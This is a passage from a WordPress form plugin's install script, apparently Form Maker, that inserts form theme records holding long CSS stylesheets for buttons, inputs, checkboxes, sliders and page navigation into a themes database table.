32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #33016B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #33016B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #33016B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #33016B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #33016B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #33016A ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #33016B ), color-stop(39%, #320169 ), color-stop(100%, #33016A )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #33016B 0%, #320169 39%, #33016A 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(27, \'Theme 07 transparent (burlywood button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #E6C18B;\r\nmargin-bottom: 10px;\r\ncolor: #E6C18B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #E6C18B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E6C18B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #E6C18B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E6C18B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #F3CC92 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3CC92 ), color-stop(39%, #F3CC92 ), color-stop(100%, #F5CB8F )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F3CC92 0%, 